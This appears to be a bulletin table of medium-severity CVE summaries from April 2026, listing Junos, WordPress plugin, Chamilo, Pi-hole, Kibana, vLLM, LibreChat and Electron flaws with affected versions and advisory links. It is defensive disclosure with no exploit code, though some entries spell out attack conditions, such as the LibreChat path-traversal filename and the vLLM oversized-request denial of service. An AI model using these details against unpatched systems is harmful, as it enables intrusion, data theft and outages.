| Juniper Networks--Junos OS Evolved | A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the advanced forwarding toolkit (evo-aftmand/evo-pfemand) of Juniper Networks Junos OS Evolved on PTX Series or QFX5000 Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS).An attacker sending crafted multicast packets will cause line cards running evo-aftmand/evo-pfemand to crash and restart or non-line card devices to crash and restart. Continued receipt and processing of these packets will sustain the Denial of Service (DoS) condition. This issue affects Junos OS Evolved PTX Series: * All versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before 24.4R2-EVO. This issue affects Junos OS Evolved on QFX5000 Series: * 22.2-EVO version before 22.2R3-S7-EVO, * 22.4-EVO version before 22.4R3-S7-EVO, * 23.2-EVO versions before 23.2R2-S4-EVO, * 23.4-EVO versions before 23.4R2-S5-EVO, * 24.2-EVO versions before 24.2R2-S1-EVO, * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved on QFX5000 Series versions before: 21.2R2-S1-EVO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EVO, and 22.1R1-EVO. | 2026-04-09 | 6.5 | CVE-2025-59969 | https://kb.juniper.net/JSA103159 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to cause denial of service to the GitLab instance due to improper input validation in GraphQL queries. | 2026-04-08 | 6.5 | CVE-2026-1101 | HackerOne Bug Bounty Report #3460228 https://gitlab.com/gitlab-org/gitlab/-/work_items/586488 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| usystemsgmbh--Webling | The Webling plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.9.0 due to insufficient input sanitization, insufficient output escaping, and missing capabilities checks in the 'webling_admin_save_form' and 'webling_admin_save_memberlist' functions. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject Webling forms and memberlists with arbitrary web scripts that will execute whenever an administrator views the related form or memberlist area of the WordPress admin. | 2026-04-10 | 6.4 | CVE-2026-1263 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bd8fbe0d-0709-4fa2-9294-393ddcd05b22?source=cve https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Form_List.php#L122 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/lists/Memberlist_List.php#L115 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_form.php#L2 https://plugins.trac.wordpress.org/browser/webling/tags/3.9.0/src/admin/actions/save_memberlist.php#L2 https://plugins.trac.wordpress.org/changeset?old_path=%2Fwebling/tags/3.9.0&new_path=%2Fwebling/tags/3.9.1 |
| magicplugins--Magic Conversation For Gravity Forms | The Magic Conversation For Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'magic-conversation' shortcode in all versions up to, and including, 3.0.97 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-1396 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc425c4a-cb4e-4f50-b85b-8c4c7778c073?source=cve https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/trunk/main.php#L1627 https://plugins.trac.wordpress.org/browser/magic-conversation-for-gravity-forms/tags/3.0.96/main.php#L1627 https://plugins.trac.wordpress.org/changeset/3482359/magic-conversation-for-gravity-forms/trunk/main.php |
| realmag777--BEAR Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net | The BEAR - Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing nonce validation on the woobe_redraw_table_row() function. This makes it possible for unauthenticated attackers to update WooCommerce product data including prices, descriptions, and other product fields via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link. | 2026-04-08 | 6.5 | CVE-2026-1672 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b5faa-1a29-4fa7-9146-d782adce0b1f?source=cve https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#L782 https://plugins.trac.wordpress.org/changeset/3457263/ https://plugins.trac.wordpress.org/changeset/3465138/ |
| wpeverest--User Registration & Membership Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder | The User Registration & Membership - Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder plugin for WordPress is vulnerable to SQL Injection via the 'membership_ids[]' parameter in all versions up to, and including, 5.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-04-08 | 6.5 | CVE-2026-1865 | https://www.wordfence.com/threat-intel/vulnerabilities/id/07c79459-66b8-4c93-a1cd-6e3ede95643f?source=cve https://plugins.trac.wordpress.org/changeset/3469042/user-registration |
| n/a--Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an escalation of privilege. Hardware reverse engineer adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via physical access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (none) impacts. | Use of Default Cryptographic Key in the hardware for some Intel(R) Pentium(R) Processor Silver Series, Intel(R) Celeron(R) Processor J Series, Intel(R) Celeron(R) Processor N Series may allow an escalation of privilege. Hardware reverse engineer adversary with a privileged user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via physical access when attack requirements are present with special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (none) impacts. | 2026-04-08 | 6.6 | CVE-2026-20709 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-00609.html |
| Juniper Networks--Junos Space | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the list filter field that, when visited by another user, enables the attacker to execute commands with the target's permissions, including an administrator. This issue affects all versions of Junos Space before 24.1R5 Patch V3. | 2026-04-09 | 6.1 | CVE-2026-21904 | https://kb.juniper.net/JSA106003 |
| Juniper Networks--JSI LWC | A Permissive List of Allowed Input vulnerability in the CLI of Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows a local, high privileged attacker to escalate their privileges to root. The CLI menu accepts input without carefully validating it, which allows for shell command injection. These shell commands are executed with root permissions and can be used to gain complete control of the system. This issue affects all JSI vLWC versions before 3.0.94. | 2026-04-09 | 6.7 | CVE-2026-21915 | https://kb.juniper.net/JSA106016 |
| Juniper Networks--Junos OS | An Incorrect Synchronization vulnerability in the management daemon (mgd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based attacker with low privileges to cause a complete Denial-of-Service (DoS) of the management plane. When NETCONF sessions are quickly established and disconnected, a locking issue causes mgd processes to hang in an unusable state. When the maximum number of mgd processes has been reached, no new logins are possible. This leads to the inability to manage the device and requires a power-cycle to recover. This issue can be monitored by checking for mgd processes in lockf state in the output of 'show system processes extensive': user@host> show system processes extensive | match mgd <pid> root 20 0 501M 4640K lockf 1 0:01 0.00% mgd If the system still can be accessed (either via the CLI or as root, which might still be possible as last resort as this won't invoke mgd), mgd processes in this state can be killed with 'request system process terminate <PID>' from the CLI or with 'kill -9 <PID>' from the shell. This issue affects: Junos OS: * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2-S1, * 24.4 versions before 24.4R1-S3, 24.4R2; This issue does not affect Junos OS versions before 23.4R1; Junos OS Evolved: * 23.4 versions before 23.4R2-S5-EVO, * 24.2 versions before 24.2R2-S1-EVO, * 24.4 versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved versions before 23.4R1-EVO; | 2026-04-09 | 6.5 | CVE-2026-21919 | https://kb.juniper.net/JSA106019 |
| addfunc--AddFunc Head & Footer Code | The AddFunc Head & Footer Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `aFhfc_head_code`, `aFhfc_body_code`, and `aFhfc_footer_code` post meta values in all versions up to, and including, 2.3. This is due to the plugin outputting these meta values without any sanitization or escaping. While the plugin restricts its own metabox and save handler to administrators via `current_user_can('manage_options')`, it does not use `register_meta()` with an `auth_callback` to protect these meta keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts via the WordPress Custom Fields interface that execute when an administrator previews or views the post. | 2026-04-10 | 6.4 | CVE-2026-2305 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d1a67-1d9b-4b73-988e-085eaa7474c6?source=cve https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L63 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L74 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/tags/2.3/addfunc-head-footer-code.php#L85 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L63 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L74 https://plugins.trac.wordpress.org/browser/addfunc-head-footer-code/trunk/addfunc-head-footer-code.php#L85 https://plugins.trac.wordpress.org/changeset?old_path=%2Faddfunc-head-footer-code/tags/2.3&new_path=%2Faddfunc-head-footer-code/tags/2.4 |
| blubrry--PowerPress Podcasting plugin by Blubrry | The Blubrry PowerPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'powerpress' and 'podcast' shortcodes in versions up to, and including, 11.15.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-2988 | https://www.wordfence.com/threat-intel/vulnerabilities/id/de25459d-9e19-4e3e-982f-0b34fa89dc30?source=cve https://plugins.trac.wordpress.org/changeset/3473781/powerpress |
| fernandobt--List category posts | The List category posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'catlist' shortcode in all versions up to, and including, 0.94.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-09 | 6.4 | CVE-2026-3005 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a93ff8a-364f-4ec4-9c32-208c7a3e1fc1?source=cve https://plugins.trac.wordpress.org/browser/list-category-posts/trunk/include/lcp-thumbnail.php#L95 https://plugins.trac.wordpress.org/changeset/3482733/ |
| uniquecodergmailcom--Pinterest Site Verification plugin using Meta Tag | The Pinterest Site Verification plugin using Meta Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_var' parameter in versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-3142 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7ccb7534-b588-4bdd-9627-0e38c0ee5e8a?source=cve https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L160 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/trunk/PinterestMetaTagSiteVerification.php#L160 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L172 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L180 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L92 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L132 https://plugins.trac.wordpress.org/browser/pinterest-site-verification/tags/1.8/PinterestMetaTagSiteVerification.php#L214 |
| wpchill--Strong Testimonials | The Strong Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonial_view shortcode in all versions up to, and including, 3.2.21 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-3239 | https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769cd-bea8-42e4-80a8-a77c0699b50c?source=cve https://plugins.trac.wordpress.org/changeset/3470120/strong-testimonials |
| posimyththemes--The Plus Addons for Elementor Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce | The The Plus Addons for Elementor - Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Progress Bar shortcode in all versions up to, and including, 6.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2026-3311 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6367c5fc-f664-4105-a1b7-a93fb0a2392b?source=cve https://plugins.trac.wordpress.org/changeset/3473275/the-plus-addons-for-elementor-page-builder |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the REST API stats endpoint allows any authenticated user (including low-privilege students with ROLE_USER) to read any other user's learning progress, certificates, and gradebook scores for any course, without enrollment or supervisory relationship. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 6.5 | CVE-2026-33141 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-j2pr-2r5w-jrpj https://github.com/chamilo/chamilo-lms/commit/792ba05953470ca971617fe2674ed14c1479fa80 |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected <form> elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5. | 2026-04-06 | 6.1 | CVE-2026-33403 | https://github.com/pi-hole/web/security/advisories/GHSA-7xqw-r9pr-qv59 |
| Elastic--Kibana | Server-Side Request Forgery (CWE-918) in Kibana One Workflow can lead to information disclosure. An authenticated user with workflow creation and execution privileges can bypass host allowlist restrictions in the Workflows Execution Engine, potentially exposing sensitive internal endpoints and data. | 2026-04-08 | 6.8 | CVE-2026-33458 | https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-28/385815 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user with access to the automatic import feature can submit specially crafted requests with excessively large input values. When multiple such requests are sent concurrently, the backend services become unstable, resulting in service disruption and deployment unavailability for all users. | 2026-04-08 | 6.5 | CVE-2026-33459 | https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-26/385814 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, the get_user_info_from_username REST API endpoint returns personal information (email, first name, last name, user ID, active status) of any user to any authenticated user, including students. There is no authorization check. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 6.5 | CVE-2026-33708 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-qwch-82q9-q999 https://github.com/chamilo/chamilo-lms/commit/4a119f93abbfba6fe833580f2463c8d4afa500c2 |
| pi-hole--pi-hole | Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Version 6.4 has a local privilege-escalation vulnerability allows code execution as root from the low-privilege pihole account. Important context: the pihole account uses nologin, so this is not a direct interactive-login issue. However, nologin does not prevent code from running as UID pihole if a Pi-hole component is compromised. In that realistic post-compromise scenario, attacker-controlled content in /etc/pihole/versions is sourced by root-run Pi-hole scripts, leading to root code execution. This vulnerability is fixed in 6.4.1. | 2026-04-06 | 6.4 | CVE-2026-33727 | https://github.com/pi-hole/pi-hole/security/advisories/GHSA-c935-8g63-qp74 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, any authenticated user (including ROLE_STUDENT) can enumerate all platform users and access personal information (email, phone, roles) via GET /api/users, including administrator accounts. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 6.5 | CVE-2026-33736 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9 https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109 |
| trailofbits--rfc3161-client | rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. This vulnerability is fixed in 1.0.6. | 2026-04-08 | 6.2 | CVE-2026-33753 | https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the configured firewall filter and access the control-plane of the device. On MX platforms with MPC10, MPC11, LC4800 or LC9600 line cards, and MX304, firewall filters applied on a loopback interface lo0.n (where n is a non-0 number) don't get executed when lo0.n is in the global VRF / default routing-instance. An affected configuration would be: user@host# show configuration interfaces lo0 | display set set interfaces lo0 unit 1 family inet filter input <filter-name> where a firewall filter is applied to a non-0 loopback interface, but that loopback interface is not referred to in any routing-instance (RI) configuration, which implies that it's used in the default RI. The issue can be observed with the CLI command: user@device> show firewall counter filter <filter_name> not showing any matches. This issue affects Junos OS on MX Series: * all versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2, * 24.4 versions before 24.4R2. | 2026-04-09 | 6.5 | CVE-2026-33774 | https://kb.juniper.net/JSA107865 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the BroadBand Edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If the authentication packet-type option is configured and a received packet does not match that packet type, the memory leak occurs. When all memory available to bbe-smgd has been consumed, no new subscribers will be able to login. The memory utilization of bbe-smgd can be monitored with the following show command: user@host> show system processes extensive | match bbe-smgd The below log message can be observed when this limit has been reached: bbesmgd[<PID>]: %DAEMON-3-SMD_DPROF_RSMON_ERROR: Resource unavailability, Reason: Daemon Heap Memory exhaustion This issue affects Junos OS on MX Series: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R2. | 2026-04-09 | 6.5 | CVE-2026-33775 | https://kb.juniper.net/JSA107821 |
| Juniper Networks--Junos OS | An Improper Following of a Certificate's Chain of Trust vulnerability in J-Web of Juniper Networks Junos OS on SRX Series allows a PITM to intercept the communication of the device and get access to confidential information and potentially modify it. When an SRX device is provisioned to connect to Security Director (SD) cloud, it doesn't perform sufficient verification of the received server certificate. This allows a PITM to intercept the communication between the SRX and SD cloud and access credentials and other sensitive information. This issue affects Junos OS: * all versions before 22.4R3-S9, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R1-S2, 25.2R2. | 2026-04-09 | 6.5 | CVE-2026-33779 | https://kb.juniper.net/JSA107823 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the Layer 2 Address Learning Daemon (l2ald) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause a memory leak ultimately leading to a Denial of Service (DoS). In an EVPN-MPLS scenario, routes learned from remote multi-homed Provider Edge (PE) devices are programmed as ESI routes. Due to a logic issue in the l2ald memory management, memory allocated for these routes is not released when there is churn for these routes. As a result, memory leaks in the l2ald process which will ultimately lead to a crash and restart of l2ald. Use the following command to monitor the memory consumption by l2ald: user@device> show system process extensive | match "PID|l2ald" This issue affects: Junos OS: * all versions before 22.4R3-S5, * 23.2 versions before 23.2R2-S3, * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2; Junos OS Evolved: * all versions before 22.4R3-S5-EVO, * 23.2 versions before 23.2R2-S3-EVO, * 23.4 versions before 23.4R2-S4-EVO, * 24.2 versions before 24.2R2-EVO. | 2026-04-09 | 6.5 | CVE-2026-33780 | https://kb.juniper.net/JSA107819 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX and QFX Series devices allow an unauthenticated, adjacent attacker to cause a complete Denial of Service (DoS). On EX4k, and QFX5k platforms configured as service-provider edge devices, if L2PT is enabled on the UNI and VSTP is enabled on NNI in VXLAN scenarios, receiving VSTP BPDUs on UNI leads to packet buffer allocation failures, resulting in the device to not pass traffic anymore until it is manually recovered with a restart.This issue affects Junos OS: * 24.4 releases before 24.4R2, * 25.2 releases before 25.2R1-S1, 25.2R2. This issue does not affect Junos OS releases before 24.4R1. | 2026-04-09 | 6.5 | CVE-2026-33781 | https://kb.juniper.net/JSA107869 |
| Juniper Networks--Junos OS | A Missing Release of Memory after Effective Lifetime vulnerability in the DHCP daemon (jdhcpd) of Juniper Networks Junos OS on MX Series, allows an adjacent, unauthenticated attacker to cause a memory leak, that will eventually cause a complete Denial-of-Service (DoS). In a DHCPv6 over PPPoE, or DHCPv6 over VLAN with Active lease query or Bulk lease query scenario, every subscriber logout will leak a small amount of memory. When all available memory has been exhausted, jdhcpd will crash and restart which causes a complete service impact until the process has recovered. The memory usage of jdhcpd can be monitored with: user@host> show system processes extensive | match jdhcpd This issue affects Junos OS: * all versions before 22.4R3-S1, * 23.2 versions before 23.2R2, * 23.4 versions before 23.4R2. | 2026-04-09 | 6.5 | CVE-2026-33782 | https://kb.juniper.net/JSA107820 |
| Juniper Networks--Junos OS Evolved | A Function Call With Incorrect Argument Type vulnerability in the sensor interface of Juniper Networks Junos OS Evolved on PTX Series allows a network-based, authenticated attacker with low privileges to cause a complete Denial of Service (DoS). If colored SRTE policy tunnels are provisioned via PCEP, and gRPC is used to monitor traffic in these tunnels, evo-aftmand crashes and doesn't restart which leads to a complete and persistent service impact. The system has to be manually restarted to recover. The issue is seen only when the Originator ASN field in PCEP contains a value larger than 65,535 (32-bit ASN). The issue is not reproducible when SRTE policy tunnels are statically configured. This issue affects Junos OS Evolved on PTX Series: * all versions before 22.4R3-S9-EVO, * 23.2 versions before 23.2R2-S6-EVO, * 23.4 versions before 23.4R2-S7-EVO, * 24.2 versions before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S2-EVO, * 25.2 versions before 25.2R1-S2-EVO, 25.2R2-EVO. | 2026-04-09 | 6.5 | CVE-2026-33783 | https://kb.juniper.net/JSA107870 |
| Juniper Networks--Junos OS | An OS Command Injection vulnerability in the CLI processing of Juniper Networks Junos OS and Junos OS Evolved allows a local, high-privileged attacker executing specific, crafted CLI commands to inject arbitrary shell commands as root, leading to a complete compromise of the system. Certain 'set system' commands, when executed with crafted arguments, are not properly sanitized, allowing for arbitrary shell injection. These shell commands are executed as root, potentially allowing for complete control of the vulnerable system. This issue affects: Junos OS: * all versions before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S7-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO. | 2026-04-09 | 6.7 | CVE-2026-33791 | https://kb.juniper.net/JSA107875 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Prior to 0.8.4, LibreChat trusts the name field returned by the execute_code sandbox when persisting code-generated artifacts. On deployments using the default local file strategy, a malicious artifact filename containing traversal sequences (for example, ../../../../../app/client/dist/poc.txt) is concatenated into the server-side destination path and written with fs.writeFileSync() without sanitization. This gives any user who can trigger execute_code an arbitrary file write primitive as the LibreChat server user. This vulnerability is fixed in 0.8.4. | 2026-04-07 | 6.3 | CVE-2026-34371 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-qrm5-r67f-6692 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.4.0 to before 3.4.9, a missing bounds check on the dataWindow attribute in EXR file headers allows an attacker to trigger a signed integer overflow in generic_unpack(). By setting dataWindow.min.x to a large negative value, OpenEXRCore computes an enormous image width, which is later used in a signed integer multiplication that overflows, causing the process to terminate with SIGILL via UBSan. This vulnerability is fixed in 3.4.9. | 2026-04-06 | 6.5 | CVE-2026-34378 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-v76p-4qvv-vh4g https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From 0.7.0 to before 0.19.0, the VideoMediaIO.load_base64() method at vllm/multimodal/media/video.py splits video/jpeg data URLs by comma to extract individual JPEG frames, but does not enforce a frame count limit. The num_frames parameter (default: 32), which is enforced by the load_bytes() code path, is completely bypassed in the video/jpeg base64 path. An attacker can send a single API request containing thousands of comma-separated base64-encoded JPEG frames, causing the server to decode all frames into memory and crash with OOM. This vulnerability is fixed in 0.19.0. | 2026-04-06 | 6.5 | CVE-2026-34755 | https://github.com/vllm-project/vllm/security/advisories/GHSA-pq5c-rjhq-qp7p |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.19.0, a Denial of Service vulnerability exists in the vLLM OpenAI-compatible API server. Due to the lack of an upper bound validation on the n parameter in the ChatCompletionRequest and CompletionRequest Pydantic models, an unauthenticated attacker can send a single HTTP request with an astronomically large n value. This completely blocks the Python asyncio event loop and causes immediate Out-Of-Memory crashes by allocating millions of request object copies in the heap before the request even reaches the scheduling queue. This vulnerability is fixed in 0.19.0. | 2026-04-06 | 6.5 | CVE-2026-34756 | https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528 https://github.com/vllm-project/vllm/pull/37952 https://github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3548de7380 |
| electron--electron | Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, when a renderer calls window.open() with a target name, Electron did not correctly scope the named-window lookup to the opener's browsing context group. A renderer could navigate an existing child window that was opened by a different, unrelated renderer if both used the same target name. If that existing child was created with more permissive webPreferences (via setWindowOpenHandler's overrideBrowserWindowOptions), content loaded by the second renderer inherits those permissions. Apps are only affected if they open multiple top-level windows with differing trust levels and use setWindowOpenHandler to grant child windows elevated webPreferences such as a privileged preload script. Apps that do not elevate child window privileges, or that use a single top-level window, are not affected. Apps that additionally grant nodeIntegration: true or sandbox: false to child windows (contrary to the security recommendations) may be exposed to arbitrary code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. | 2026-04-07 | 6 | CVE-2026-34765 | https://github.com/electron/electron/security/advisories/GHSA-f3pv-wv63-48x8 |
| burlingtonbytes--WP Blockade Visual Page Builder | The WP Blockade plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 0.9.14. The plugin registers an admin_post action hook 'wp-blockade-shortcode-render' that maps to the render_shortcode_preview() function. This function lacks any capability check (current_user_can()) and nonce verification, allowing any authenticated user to execute arbitrary WordPress shortcodes. The function takes a user-supplied 'shortcode' parameter from $_GET, passes it through stripslashes(), and directly executes it via do_shortcode(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes, which could lead to information disclosure, privilege escalation, or other impacts depending on what shortcodes are registered on the site (e.g., shortcodes from other plugins that display sensitive data, perform actions, or include files). | 2026-04-08 | 6.5 | CVE-2026-3480 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3f159aac-092b-4655-9d97-a496ac01738c?source=cve https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L361 